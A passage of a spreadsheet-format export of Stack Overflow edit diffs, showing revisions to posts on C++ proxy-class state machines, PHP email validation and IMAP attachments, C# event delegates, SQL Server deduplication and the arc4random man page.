  FuncPtr a = &lt;span class="diff-delete"&gt;stateA&lt;/span&gt;();  // natural usage syntax_x000D_
  return 0;_x000D_
}    _x000D_
_x000D_
StateMethod stateA_x000D_
{_x000D_
  return stateA; // natural return syntax_x000D_
}_x000D_
_x000D_
StateMethod stateB_x000D_
{_x000D_
  return &lt;span class="diff-delete"&gt;stateA; // :)&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; This solution has three main strengths:&lt;/p&gt; _x000D_
  &lt;ol&gt; _x000D_
   &lt;li&gt;&lt;p&gt; It solves the problem as required. Better still, it's type-safe and portable.&lt;/p&gt; &lt;/li&gt; _x000D_
   &lt;li&gt;&lt;p&gt; Its machinery is transparent: You get natural syntax for the caller/user, and natural syntax for the function's own "return stateA;" statement.&lt;/p&gt; &lt;/li&gt; _x000D_
   &lt;li&gt;&lt;p&gt; It probably has zero overhead: On modern compilers, the proxy class, with its storage and functions, should inline and optimize away to nothing.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;/ol&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gotw.ca/gotw/057.htm" rel="nofollow noreferrer"&gt;GotW #57&lt;/a&gt; says to use a proxy class with an implicit conversion for this very purpose.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;struct StateMethod;_x000D_
typedef StateMethod (&lt;span class="diff-add"&gt;StateMachine:: &lt;/span&gt;*FuncPtr)();&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
struct StateMethod_x000D_
{_x000D_
  StateMethod( FuncPtr pp ) : p( pp ) { }_x000D_
  operator FuncPtr() { return p; }_x000D_
  FuncPtr p;&lt;span class="diff-add"&gt;_x000D_
};_x000D_
_x000D_
class StateMachine {_x000D_
  StateMethod stateA();_x000D_
  StateMethod stateB();&lt;/span&gt;_x000D_
};_x000D_
_x000D_
int main()_x000D_
{_x000D_
  &lt;span class="diff-add"&gt;StateMachine *fsm = new StateMachine();_x000D_
  &lt;/span&gt;FuncPtr a = &lt;span class="diff-add"&gt;fsm-&amp;gt;stateA&lt;/span&gt;();  // natural usage syntax_x000D_
  return 0;_x000D_
}    _x000D_
_x000D_
StateMethod &lt;span class="diff-add"&gt;StateMachine::&lt;/span&gt;stateA_x000D_
{_x000D_
  return stateA; // natural return syntax_x000D_
}_x000D_
_x000D_
StateMethod &lt;span class="diff-add"&gt;StateMachine::&lt;/span&gt;stateB_x000D_
{_x000D_
  return &lt;span class="diff-add"&gt;stateB;&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; This solution has three main strengths:&lt;/p&gt; _x000D_
  &lt;ol&gt; _x000D_
   &lt;li&gt;&lt;p&gt; It solves the problem as required. Better still, it's type-safe and portable.&lt;/p&gt; &lt;/li&gt; _x000D_
   &lt;li&gt;&lt;p&gt; Its machinery is transparent: You get natural syntax for the caller/user, and natural syntax for the function's own "return stateA;" statement.&lt;/p&gt; &lt;/li&gt; _x000D_
   &lt;li&gt;&lt;p&gt; It probably has zero overhead: On modern compilers, the proxy class, with its storage and functions, should inline and optimize away to nothing.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;/ol&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jacob Krall</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Have you looked at &lt;a href="http://us2.php.net/manual/en/function.filter-var.php" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;PHP's filter_ functions&lt;/span&gt;&lt;/a&gt;? They're not perfect, but they do a fairly decent job in my experience.&lt;/p&gt; _x000D_
 &lt;p&gt; Example usage (returns boolean):&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;filter_var($someEmail, FILTER_VALIDATE_EMAIL);&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Have you looked at &lt;a href="http://uk2.php.net/manual/en/function.filter-var.php" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;PHP's filter_ functions&lt;/span&gt;&lt;/a&gt;? They're not perfect, but they do a fairly decent job in my experience.&lt;/p&gt; _x000D_
 &lt;p&gt; Example usage (returns boolean):&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;filter_var($someEmail, FILTER_VALIDATE_EMAIL);&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; C# supports some inherited covariance for event delegates, so a method like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void &lt;span class="diff-delete"&gt;LowestCommonHandler&lt;/span&gt;( object sender, EventArgs e ) { ... } _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Can be used to subscribe to your event, no explicit cast required&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gcInt.MyEvent += &lt;span class="diff-delete"&gt;LowestCommonHandler;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You can even use &lt;a href="http://msdn.microsoft.com/en-us/library/bb397687" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;lambda&lt;/span&gt;&lt;/a&gt; syntax and the intellisense will &lt;span class="diff-delete"&gt;even infer the right types&lt;/span&gt; for you:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gcInt.MyEvent += (sender, e) =&amp;gt;_x000D_
{_x000D_
    e. //you'll get correct intellisense here_x000D_
};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; C# supports some inherited covariance for event delegates, so a method like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void &lt;span class="diff-add"&gt;LowestCommonHander&lt;/span&gt;( object sender, EventArgs e ) { ... } _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Can be used to subscribe to your event, no explicit cast required&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gcInt.MyEvent += &lt;span class="diff-add"&gt;LowestCommonHander;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You can even use &lt;span class="diff-add"&gt;Linq&lt;/span&gt; syntax and the intellisense will &lt;span class="diff-add"&gt;all be done&lt;/span&gt; for you:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gcInt.MyEvent += (sender, e) =&amp;gt;_x000D_
{_x000D_
    e. //you'll get correct intellisense here_x000D_
};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Blumer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This has been an adventure. I started with the looping duplicate query &lt;a href="http://stackoverflow.com/questions/161960/sql-server-query-question-if-i-stop-a-long-running-query-does-it-rollback"&gt;located in my previous question&lt;/a&gt;, but each loop would go over all &lt;strong&gt;17 million records&lt;/strong&gt;...&lt;strong&gt;meaning it would take weeks&lt;/strong&gt; (just running &lt;em&gt;select count * from MyTable&lt;/em&gt; takes my server 4:30 minutes =&amp;gt; mssql 2005). I gleamed information from this site and at this post:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt;&lt;a href="http://weblogs.sqlteam.com/jeffs/archive/2007/03/28/60146.aspx" rel="nofollow noreferrer"&gt;http://weblogs.sqlteam.com/jeffs/archive/2007/03/28/60146.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; And have arrived at the query below. The question is, is this the correct type of query to run on 17 million records for any type of performance? If it isn't, what is?&lt;/p&gt; _x000D_
 &lt;p&gt; SQL QUERY:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;DELETE&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
&lt;span class="hljs-keyword"&gt;WHERE&lt;/span&gt; RecordID &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; _x000D_
(&lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
    &lt;span class="hljs-keyword"&gt;EXCEPT&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; (_x000D_
        &lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID, &lt;span class="hljs-built_in"&gt;Rank&lt;/span&gt;() &lt;span class="hljs-keyword"&gt;over&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;Partition&lt;/span&gt; &lt;span class="hljs-keyword"&gt;BY&lt;/span&gt; BusinessName, latitude, longitude,&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;        Phone &lt;span class="hljs-keyword"&gt;ORDER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;BY&lt;/span&gt; webaddress &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt;, caption1 &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt;, caption2 &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt; ) &lt;span class="hljs-keyword"&gt;AS&lt;/span&gt; Rank_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
    ) al &lt;span class="hljs-keyword"&gt;WHERE&lt;/span&gt; Rank &lt;span class="hljs-operator"&gt;=&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This has been an adventure. I started with the looping duplicate query &lt;a href="http://stackoverflow.com/questions/161960/sql-server-query-question-if-i-stop-a-long-running-query-does-it-rollback"&gt;located in my previous question&lt;/a&gt;, but each loop would go over all &lt;strong&gt;17 million records&lt;/strong&gt;...&lt;strong&gt;meaning it would take weeks&lt;/strong&gt; (just running &lt;em&gt;select count * from MyTable&lt;/em&gt; takes my server 4:30 minutes =&amp;gt; mssql 2005). I gleamed information from this site and at this post:&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;br&gt;&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt;&lt;a href="http://weblogs.sqlteam.com/jeffs/archive/2007/03/28/60146.aspx" rel="nofollow noreferrer"&gt;http://weblogs.sqlteam.com/jeffs/archive/2007/03/28/60146.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; And have arrived at the query below. The question is, is this the correct type of query to run on 17 million records for any type of performance? If it isn't, what is?&lt;/p&gt; _x000D_
 &lt;p&gt; SQL QUERY:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;DELETE&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
&lt;span class="hljs-keyword"&gt;WHERE&lt;/span&gt; RecordID &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; _x000D_
(&lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
    &lt;span class="hljs-keyword"&gt;EXCEPT&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; (_x000D_
        &lt;span class="hljs-keyword"&gt;SELECT&lt;/span&gt; RecordID, &lt;span class="hljs-built_in"&gt;Rank&lt;/span&gt;() &lt;span class="hljs-keyword"&gt;over&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;Partition&lt;/span&gt; &lt;span class="hljs-keyword"&gt;BY&lt;/span&gt; BusinessName, latitude, longitude,&lt;span class="diff-add"&gt;   &lt;/span&gt;        Phone &lt;span class="hljs-keyword"&gt;ORDER&lt;/span&gt; &lt;span class="hljs-keyword"&gt;BY&lt;/span&gt; webaddress &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt;, caption1 &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt;, caption2 &lt;span class="hljs-keyword"&gt;DESC&lt;/span&gt; ) &lt;span class="hljs-keyword"&gt;AS&lt;/span&gt; Rank_x000D_
    &lt;span class="hljs-keyword"&gt;FROM&lt;/span&gt; tl_acxiomimport.dbo.tblacxiomlistings_x000D_
    ) al &lt;span class="hljs-keyword"&gt;WHERE&lt;/span&gt; Rank &lt;span class="hljs-operator"&gt;=&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ConroyP</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been battling &lt;code&gt;&lt;span class="diff-delete"&gt;PHP's&lt;/span&gt;&lt;/code&gt; email reading functions for the better part of two days. I'm writing a script to read emails from a &lt;code&gt;&lt;span class="diff-delete"&gt;mailbox&lt;/span&gt;&lt;/code&gt; and save any attachments onto the server. If you've ever done something similar, you might understand my pain: &lt;strong&gt;PHP doesn't play well with email!&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I've connected to the &lt;code&gt;&lt;span class="diff-delete"&gt;POP3&lt;/span&gt;&lt;/code&gt; server and I can iterate the files. Here's a rough outline of the code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;if (!$mbox = imap_open ("{myserver.com:110/pop3/notls}INBOX", "u", "p"))_x000D_
    die ('Cannot connect/check mail! Exiting');_x000D_
_x000D_
if ($hdr = imap_check($mbox)) _x000D_
    $msgCount = $hdr-&amp;gt;Nmsgs;_x000D_
else _x000D_
    die ("Failed to get mail");_x000D_
_x000D_
foreach ($overview as $message) {_x000D_
    $msgStruct = imap_fetchstructure($mbox, $message-&amp;gt;msgno);_x000D_
    _x000D_
    // if it has parts, there are attachments that need reading_x000D_
    if ($msgStruct-&amp;gt;parts) {_x000D_
        foreach ($msgStruct-&amp;gt;parts as $key =&amp;gt; $part) {_x000D_
            switch (strtoupper($part-&amp;gt;subtype)) {_x000D_
                case 'GIF': case 'JPEG':case 'PNG':_x000D_
_x000D_
                    //do something - but what?!_x000D_
_x000D_
                    break;_x000D_
            }_x000D_
        }_x000D_
    }_x000D_
}_x000D_
    _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I've marked where I'm stuck. I can use &lt;code&gt;imap_fetchbody($mbox, $message-&amp;gt;msgno, $key+1)&lt;/code&gt; but that gets me a bunch of data like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8S_x000D_
EhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEU_x000D_
Hh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAAR_x000D_
CAHiAi0DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA_x000D_
AgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK_x000D_
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG_x000D_
h4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl_x000D_
5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA_x000D_
..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'm lead to believe that this is &lt;code&gt;&lt;span class="diff-delete"&gt;MIME data&lt;/span&gt;&lt;/code&gt;. I need it as an image! I've seen several classes bombing around the internet that claim to do the required wizardry. I can't get any of them to work. I don't understand why I'm finding this so hard!&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;In short&lt;/strong&gt;, I'm looking for something that can turn a raw &lt;code&gt;&lt;span class="diff-delete"&gt;MIME string&lt;/span&gt;&lt;/code&gt; into real data.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been battling &lt;span class="diff-add"&gt;PHP's&lt;/span&gt; email reading functions for the better part of two days. I'm writing a script to read emails from a &lt;span class="diff-add"&gt;mailbox&lt;/span&gt; and save any attachments onto the server. If you've ever done something similar, you might understand my pain: &lt;strong&gt;PHP doesn't play well with email!&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I've connected to the &lt;span class="diff-add"&gt;POP3&lt;/span&gt; server and I can iterate the files. Here's a rough outline of the code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;if (!$mbox = imap_open ("{myserver.com:110/pop3/notls}INBOX", "u", "p"))_x000D_
    die ('Cannot connect/check mail! Exiting');_x000D_
_x000D_
if ($hdr = imap_check($mbox)) _x000D_
    $msgCount = $hdr-&amp;gt;Nmsgs;_x000D_
else _x000D_
    die ("Failed to get mail");_x000D_
_x000D_
foreach ($overview as $message) {_x000D_
    $msgStruct = imap_fetchstructure($mbox, $message-&amp;gt;msgno);_x000D_
    _x000D_
    // if it has parts, there are attachments that need reading_x000D_
    if ($msgStruct-&amp;gt;parts) {_x000D_
        foreach ($msgStruct-&amp;gt;parts as $key =&amp;gt; $part) {_x000D_
            switch (strtoupper($part-&amp;gt;subtype)) {_x000D_
                case 'GIF': case 'JPEG':case 'PNG':_x000D_
_x000D_
                    //do something - but what?!_x000D_
_x000D_
                    break;_x000D_
            }_x000D_
        }_x000D_
    }_x000D_
}_x000D_
    _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I've marked where I'm stuck. I can use &lt;code&gt;imap_fetchbody($mbox, $message-&amp;gt;msgno, $key+1)&lt;/code&gt; but that gets me a bunch of data like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8S_x000D_
EhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEU_x000D_
Hh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAAR_x000D_
CAHiAi0DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA_x000D_
AgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK_x000D_
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG_x000D_
h4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl_x000D_
5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA_x000D_
..._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'm lead to believe that this is &lt;span class="diff-add"&gt;MIME data&lt;/span&gt;. I need it as an image! I've seen several classes bombing around the internet that claim to do the required wizardry. I can't get any of them to work. I don't understand why I'm finding this so hard!&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;In short&lt;/strong&gt;, I'm looking for something that can turn a raw &lt;span class="diff-add"&gt;MIME string&lt;/span&gt; into real data.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Oli</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should use the arc4random() function. It uses a superior algorithm to rand. You don't even need to set a seed.&lt;/p&gt; _x000D_
 &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
..._x000D_
..._x000D_
&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; r = arc4random() % &lt;span class="hljs-number"&gt;74&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The arc4random man page:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; NAME arc4random, arc4random_stir, arc4random_addrandom -- arc4 random number generator&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; LIBRARY Standard C Library (libc, -lc)&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; SYNOPSIS #include &amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; u_int32_t_x000D_
 arc4random(&lt;span class="hljs-keyword"&gt;void&lt;/span&gt;);_x000D_
_x000D_
 &lt;span class="hljs-keyword"&gt;void&lt;/span&gt;_x000D_
 arc4random_stir(&lt;span class="hljs-keyword"&gt;void&lt;/span&gt;);_x000D_
_x000D_
 &lt;span class="hljs-keyword"&gt;void&lt;/span&gt;_x000D_
 arc4random_addrandom(&lt;span class="hljs-keyword"&gt;unsigned&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; *dat, &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; datlen);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; DESCRIPTION The arc4random() function uses the key stream generator employed by the arc4 cipher, which uses 8*8 8 bit S-Boxes. The S-Boxes can be in about (2&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;1700) states. The arc4random() function returns pseudo- random numbers in the range of 0 to (2&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;32)-1, and therefore has twice the range of rand(3) and random(3).&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; The arc4random_stir() function reads data from /dev/urandom and uses it to permute the S-Boxes via_x000D_
 arc4random_addrandom()._x000D_
_x000D_
 There is no need to call arc4random_stir() before using arc4random(), since arc4random() automatically_x000D_
 initializes itself._x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; EXAMPLES The following produces a drop-in replacement for the traditional rand() and random() functions using arc4random():&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;       &lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; foo4random() (arc4random() % ((unsigned)RAND_MAX + 1))&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should use the arc4random() function. It uses a superior algorithm to rand. You don't even need to set a seed.&lt;/p&gt; _x000D_
 &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
..._x000D_
..._x000D_
&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; r = arc4random() % &lt;span class="hljs-number"&gt;74&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The arc4random man page:&lt;/p&gt; _x000D_
 &lt;pre class="lang-objectivec s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;NAME_x000D_
     arc4random, arc4random_stir, arc4random_addrandom -- arc4 random number generator_x000D_
_x000D_
LIBRARY_x000D_
     Standard C Library (libc, -lc)_x000D_
_x000D_
SYNOPSIS_x000D_
     &lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
_x000D_
     u_int32_t_x000D_
     arc4random(&lt;span class="hljs-keyword"&gt;void&lt;/span&gt;);_x000D_
_x000D_
     &lt;span class="hljs-keyword"&gt;void&lt;/span&gt;_x000D_
     arc4random_stir(&lt;span class="hljs-keyword"&gt;void&lt;/span&gt;);_x000D_
_x000D_
     &lt;span class="hljs-keyword"&gt;void&lt;/span&gt;_x000D_
     arc4random_addrandom(&lt;span class="hljs-keyword"&gt;unsigned&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; *dat, &lt;span class="hljs-keyword"&gt;int&lt;/span&gt; datlen);_x000D_
_x000D_
DESCRIPTION_x000D_
     The arc4random() function uses the key stream generator employed by the arc4 cipher, which uses &lt;span class="hljs-number"&gt;8&lt;/span&gt;*&lt;span class="hljs-number"&gt;8&lt;/span&gt; &lt;span class="hljs-number"&gt;8&lt;/span&gt;_x000D_
     bit S-Boxes.  The S-Boxes can be &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; about (&lt;span class="hljs-number"&gt;2&lt;/span&gt;**&lt;span class="hljs-number"&gt;1700&lt;/span&gt;) states.  The arc4random() function returns pseudo-_x000D_
     random numbers &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; the range of &lt;span class="hljs-number"&gt;0&lt;/span&gt; to (&lt;span class="hljs-number"&gt;2&lt;/span&gt;**&lt;span class="hljs-number"&gt;32&lt;/span&gt;)&lt;span class="hljs-number"&gt;-1&lt;/span&gt;, and therefore has twice the range of rand(&lt;span class="hljs-number"&gt;3&lt;/span&gt;) and_x000D_
     random(&lt;span class="hljs-number"&gt;3&lt;/span&gt;)._x000D_
_x000D_
     The arc4random_stir() function reads data from /dev/urandom and uses it to permute the S-Boxes via_x000D_
     arc4random_addrandom()._x000D_
_x000D_
     There is no need to call arc4random_stir() before using arc4random(), since arc4random() automatically_x000D_
     initializes itself._x000D_
_x000D_
EXAMPLES_x000D_
     The following produces a drop-&lt;span class="hljs-keyword"&gt;in&lt;/span&gt; replacement &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; the traditional rand() and random() functions using_x000D_
     arc4random():_x000D_
_x000D_
           &lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; foo4random() (arc4random() % ((unsigned)RAND_MAX + 1))&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Undo â™¦</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's what &lt;a href="http://en.wikipedia.org/wiki/RegexBuddy" rel="nofollow noreferrer"&gt;RegexBuddy&lt;/a&gt; uses.&lt;/p&gt; _x000D_
